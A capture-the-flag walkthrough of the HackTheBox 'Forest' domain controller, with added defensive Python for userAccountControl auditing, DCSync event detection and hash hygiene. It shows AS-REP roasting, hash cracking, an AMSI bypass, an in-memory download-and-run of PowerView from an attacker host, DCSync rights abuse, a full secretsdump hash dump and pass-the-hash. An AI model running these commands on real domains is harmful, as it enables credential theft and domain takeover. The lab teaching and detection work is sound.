In this walkthrough, we will be going through the Forest room from HackTheBox. This room is rated as Easy on the platform, and the initial foothold comes from AS-REP roasting. For privilege escalation, the DCSync privilege was abused to get root. So, let’s get started without any delay.
Machine Info:
| Field | Value |
|---|---|
| Title | Forest |
| IP address | 10.10.10.161 |
| Difficulty | Medium |
| OS | Windows |
| Description | Forest is an easy difficulty Windows Domain Controller (DC) machine which requires initial foothold via AS-REP roasting. For privilege escalation, DCSync privilege is abused to dump the hashes. |
Enumeration:
- I started off with a regular nmap scan with service version detection and found a lot of open ports, as expected from a Windows box. The most important thing to note here is port 88, the Kerberos service, which confirms that we are working with an AD environment. Other important ports to look for are 135, 139 and 445 (RPC and SMB) and 3268 (LDAP).

```
$ sudo nmap -sS -sV 10.10.10.161
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-02 20:43 IST
Nmap scan report for 10.10.10.161
Host is up (0.20s latency).
Not shown: 989 closed ports
PORT     STATE    SERVICE      VERSION
53/tcp   filtered domain
88/tcp   open     kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-02 15:21:00Z)
135/tcp  open     msrpc        Microsoft Windows RPC
139/tcp  open     netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open     microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp  open     kpasswd5?
593/tcp  open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open     tcpwrapped
3268/tcp open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open     tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.28 seconds
```
- I tried to enumerate the SMB ports for any writable shares and found nothing.
- Next, I used rpcclient with a null session to enumerate some potential usernames.

```
$ rpcclient -U '' -N 10.10.10.161
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> exit
```
- Used ldapsearch with an anonymous bind to query the running LDAP service for more usernames.

```
$ ldapsearch -H ldap://10.10.10.161 -x -b "DC=htb,DC=local" '(objectClass=User)' "sAMAccountName" | grep sAMAccountName
# requesting: sAMAccountName
sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: FOREST$
sAMAccountName: EXCH01$
sAMAccountName: $331000-VK4ADACQNUCA
sAMAccountName: SM_2c8eef0a09b545acb
sAMAccountName: SM_ca8c2ed5bdab4dc9b
sAMAccountName: SM_75a538d3025e4db9a
sAMAccountName: SM_681f53d4942840e18
sAMAccountName: SM_1b41c9286325456bb
sAMAccountName: SM_9b69f1b9d2cc45549
sAMAccountName: SM_7c96b981967141ebb
sAMAccountName: SM_c75ee099d0a64c91b
sAMAccountName: SM_1ffab36a2f5f479cb
sAMAccountName: HealthMailboxc3d7722
sAMAccountName: HealthMailboxfc9daad
sAMAccountName: HealthMailboxc0a90c9
sAMAccountName: HealthMailbox670628e
sAMAccountName: HealthMailbox968e74d
sAMAccountName: HealthMailbox6ded678
sAMAccountName: HealthMailbox83d6781
sAMAccountName: HealthMailboxfd87238
sAMAccountName: HealthMailboxb01ac64
sAMAccountName: HealthMailbox7108a4e
sAMAccountName: HealthMailbox0659cc1
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
```

- Got a bunch of them, and the interesting one here is “svc-alfresco”.
Exploitation:
Performing AS-REP roasting

- I tried AS-REP roasting by asking the DC for any accounts with the “Do not require Kerberos preauthentication” flag set, and got a hit for svc-alfresco. Bingo!

```
python3 ~/Tools/impacket/examples/GetNPUsers.py -dc-ip 10.10.10.161 'HTB.LOCAL/' -request
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2023-12-02 21:15:09.018446  2023-12-02 21:03:47.001366  0x410200

[email protected]:bcba5e98bbabadff560a22090ca8c772$015503fae0e71887930df93bc020f9f9004428a5c9255570e24dd95da632007c8ddbdf047077a72e09e5c53c46499e7b7df0183c6c140907666959330b08932a563fcf1375d7e7c4fd5910bdb9dfefaa576a38d3adb0c19206daa2a7fa7b448aa58c60a65d8036d08ab44492067d3f3581b78f3d3ad9cdb1d9ccc1e122dea60c6d0ffb1b07488549750d69296a599eab4f4a70305a40edefbef87eeb9d678083a51ce3e60c994f68a87cf501795682695f4501f35afad661b7e3ff71070cfb64ecd445ec6ae16aedbbf6256a1f3a777231ed6c59eb2bd7180c51697ef5c2de155e700d0f661a
```
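The UAC column above is the raw userAccountControl bitmask, and 0x410200 is what makes svc-alfresco roastable: the 0x400000 bit (DONT_REQ_PREAUTH) is set. As an added example, not code from the original write-up, the Python below decodes that bitmask and lists the enabled accounts an auditor should care about, which is the same list GetNPUsers produces but computed from an account export instead of from Kerberos traffic. The flag bits are the documented userAccountControl values; svc-alfresco's value comes from the output above, while the other sample accounts and their values are constructed for contrast.

```python
# Added example, not code from the original write-up: decode userAccountControl
# bits and list the enabled accounts that do not require Kerberos pre-authentication.

# Documented userAccountControl flag bits (the subset relevant to an audit).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000


def decode_uac(value):
    """Return the set of flag names set in a userAccountControl value."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def parse_getnpusers_row(row):
    """Pull (name, uac) out of one data row of the GetNPUsers table.

    The MemberOf column can contain spaces, so only the first and the last
    whitespace-separated fields are trusted.
    """
    fields = row.split()
    return fields[0], int(fields[-1], 16)


def asrep_roastable(accounts):
    """Names of enabled accounts for which the KDC answers an AS-REQ without
    pre-authentication, i.e. the accounts AS-REP roasting would hit."""
    return [name for name, uac in accounts
            if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE]


# Constructed sample. svc-alfresco's value is the one GetNPUsers printed above;
# the other three accounts and their values are made up for contrast.
SAMPLE_ACCOUNTS = [
    ("svc-alfresco", 0x410200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
    ("sebastien", 0x10200),      # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD: pre-auth required
    ("old-svc", 0x400202),       # pre-auth disabled, but the account itself is disabled
    ("FOREST$", 0x82000),        # SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION (the DC)
]

if __name__ == "__main__":
    for name, uac in SAMPLE_ACCOUNTS:
        print(f"{name:14} 0x{uac:06x}  {sorted(decode_uac(uac))}")
    print("AS-REP roastable:", asrep_roastable(SAMPLE_ACCOUNTS))
```

Run against an export of sAMAccountName and userAccountControl for every account, this is a cheap check to make before somebody else makes it. Note that 0x410200 also carries DONT_EXPIRE_PASSWORD, so the password that can be cracked offline is one that never rotates.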
- Next, cracked the obtained hash with hashcat (mode 18200 is Kerberos 5 AS-REP etype 23), which gives us the password of our user svc-alfresco.

```
hashcat -m 18200 hash.txt rockyou.txt -O
```

svc-alfresco : s3rvice
- Next, I sprayed the creds across the network using crackmapexec to see which resources we could access, and got a positive hit on the DC.

```
crackmapexec smb 10.10.10.161 -u svc-alfresco -p s3rvice
```
Performing Pass the Password attack
- Logged into the DC as svc-alfresco using Evil-WinRM, which gave us the initial foothold and thus the user flag.

```
evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice
```
Post-Compromise Enumeration:
- Next, uploaded the SharpHound ingestor to the target and executed it to collect domain data.

```
upload /home/wh1terose/CTF/HTB/machines/Forest/SharpHound.exe
./SharpHound.exe
```
- Downloaded the generated zip file and imported it into BloodHound for further analysis.

```
download "C:/Users/svc-alfresco/Desktop/20231203014749_BloodHound.zip" /home/wh1terose/CTF/HTB/machines/Forest/20231203014749_BloodHound.zip
```

- Next, we ran some of the pre-built queries in BloodHound and found that the “Exchange Windows Permissions” group has WriteDacl (DACL write access) on the HTB.LOCAL domain object, and that we can reach that group through “Account Operators”, which svc-alfresco is a member of. So, if we can get a user into “Exchange Windows Permissions”, we can grant that user DCSync rights and dump the user hashes from the DC.
Privilege Escalation:
- Moving on, added a new domain user elliot and put it in the “Exchange Windows Permissions” group and the local “Remote Management Users” group.

```
net user elliot password /add /domain
net group "Exchange Windows Permissions" elliot /add
net localgroup "Remote Management Users" elliot /add
```
- Used Evil-WinRM’s built-in Bypass-4MSI command (listed under menu) to get past Defender’s AMSI protection for our scripts.

```
menu
```
- Next, downloaded PowerView from our attacking machine’s web server and executed it in memory on the target with the command below.

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6:8000/Powerview.ps1')
```
- Now, using PowerView’s Add-DomainObjectAcl, granted DCSync rights on the domain object to our user elliot.

```
$pass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\elliot', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity elliot -Rights DCSync
```

Performing DCSync Attack
- Dumped all the user hashes, including the Administrator’s, using Impacket’s secretsdump.py script.

```
$ python3 ~/Tools/impacket/examples/secretsdump.py htb/elliot:'password'@10.10.10.161
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
hacked:9601:aad3b435b51404eeaad3b435b51404ee:03c78cf07caa988b31d0a4edad93777f:::
elliot:9602:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:8ea4034b35b20ae73f507d025927ddfc:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
hacked:aes256-cts-hmac-sha1-96:b1904704afb3a0f07dfb4f03758d92627572772e832ff1ec57fe95933b895dec
hacked:aes128-cts-hmac-sha1-96:b402dad178d9e024a7e13b0e4b603eb3
hacked:des-cbc-md5:9eab406880a85149
elliot:aes256-cts-hmac-sha1-96:713c38d181a9473fd5d44b288a38323ac72bd89d19851648bb4ce3ca9f7556b5
elliot:aes128-cts-hmac-sha1-96:7db9e45c2d3d07fc29eeac5c7aec8d79
elliot:des-cbc-md5:64581620ab75e58a
FOREST$:aes256-cts-hmac-sha1-96:ae594c09ac8b176fbce65d1d711ce53164e17e4d4a1d8349a4d26bc3edc69966
FOREST$:aes128-cts-hmac-sha1-96:072f6f6780585a632834e7325639251b
FOREST$:des-cbc-md5:fb5dc73e01cbb046
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
```
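The escalation chain above (a member added to “Exchange Windows Permissions” and “Remote Management Users”, the domain object’s ACL rewritten, then a replication request from an ordinary user account) leaves a recognisable trail in the DC’s Security log. As an added example, not part of the original write-up, the Python below runs three rules over constructed event records shaped like parsed Security events 4728/4732/4756 (member added to a global/local/universal group), 5136 (directory service object modified) and 4662 (operation performed on an object). The replication-right GUIDs are the documented control-access rights a DCSync needs and the event IDs and field names are the standard ones; the sample records, the sensitive-group list and the allowlist are constructed.

```python
# Added example, not part of the original write-up: detection rules for the
# group-add -> ACL-rewrite -> DCSync chain, run over constructed Security events.

# Control-access rights a DCSync needs (documented extended-right GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# 4728 / 4732 / 4756: member added to a global / local / universal security group.
GROUP_ADD_EVENTS = {4728, 4732, 4756}
# Constructed watch list; tune to the estate.
SENSITIVE_GROUPS = {"exchange windows permissions", "account operators",
                    "domain admins", "remote management users"}
# Constructed allowlist of non-DC accounts that legitimately replicate
# (for example a directory-sync service account).
REPLICATION_ALLOWLIST = {"svc-dirsync"}


def is_machine_account(name):
    return name.endswith("$")


def detect(events):
    """Return (rule, subject, detail) findings for a sequence of event dicts."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        subject = ev.get("SubjectUserName", "")
        if eid in GROUP_ADD_EVENTS:
            group = ev.get("TargetUserName", "")
            if group.lower() in SENSITIVE_GROUPS:
                findings.append(("sensitive-group-add", subject,
                                 f'{ev["MemberName"]} added to {group}'))
        elif eid == 5136 and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor":
            # The security descriptor of a directory object was rewritten.
            findings.append(("acl-modified", subject, ev["ObjectDN"]))
        elif eid == 4662:
            props = ev.get("Properties", "").lower()
            rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
            if rights and not is_machine_account(subject) \
                    and subject.lower() not in REPLICATION_ALLOWLIST:
                findings.append(("dcsync", subject, ", ".join(rights)))
    return findings


# Constructed sample events mirroring the steps in the write-up.
SAMPLE_EVENTS = [
    {"EventID": 4756, "SubjectUserName": "svc-alfresco",
     "MemberName": "CN=elliot,CN=Users,DC=htb,DC=local",
     "TargetUserName": "Exchange Windows Permissions"},
    {"EventID": 4732, "SubjectUserName": "svc-alfresco",
     "MemberName": "CN=elliot,CN=Users,DC=htb,DC=local",
     "TargetUserName": "Remote Management Users"},
    {"EventID": 5136, "SubjectUserName": "elliot", "ObjectDN": "DC=htb,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "elliot",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Normal replication between domain controllers: machine account, no alert.
    {"EventID": 4662, "SubjectUserName": "FOREST$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A read of an unrelated object class: no replication right in Properties.
    {"EventID": 4662, "SubjectUserName": "lucinda",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for rule, subject, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {subject}: {detail}")
```

Two caveats on deployment: 4662 is only written when the domain object’s SACL audits the replication rights, and 5136 needs Directory Service Changes auditing turned on. Legitimate replication comes from DC machine accounts (names ending in $) and from whatever sync accounts the estate runs, which is what the allowlist is for; a replication request from any other principal, as in the secretsdump run above, is the alert.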
- At last, performed a pass-the-hash attack with the Administrator’s NT hash using Evil-WinRM and got admin access. Captured the root flag and waved it high.

```
evil-winrm.rb -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
```
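When a dump like the one above lands on an incident responder’s desk, the first questions are how many accounts had no password at all (the many 31d6cfe0… entries), whether LM hashes were still being stored, and which accounts shared a password. As an added example (not the write-up’s own code), the Python below parses secretsdump-style lines and answers those three questions. The empty-password LM and NT hash constants are the well-known ones; the sample dump is constructed with made-up hash values, modelled on the output above.

```python
# Added example, not the write-up's own code: a password-hygiene audit over
# secretsdump-style NTDS lines ("domain\user:rid:lmhash:nthash:::").
import re
from collections import defaultdict

# Well-known hashes of the empty password. The LM field holds EMPTY_LM whenever
# LM storage is disabled, so any other value there means an LM hash is stored.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text):
    """Return one dict per credential line; banners and Kerberos key lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["rid"] = int(entry["rid"])
            entries.append(entry)
    return entries


def audit(entries):
    """Flag blank passwords, stored LM hashes and NT hashes shared by several accounts."""
    findings = {"blank_password": [], "lm_hash_present": [], "shared_password": []}
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] == EMPTY_NT:
            findings["blank_password"].append(e["user"])
        if e["lm"] != EMPTY_LM:
            findings["lm_hash_present"].append(e["user"])
        by_nt[e["nt"]].append(e["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_password"].append(sorted(users))
    return findings


# Constructed sample modelled on the dump above; the hash values are made up.
SAMPLE_DUMP = r"""[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000002:::
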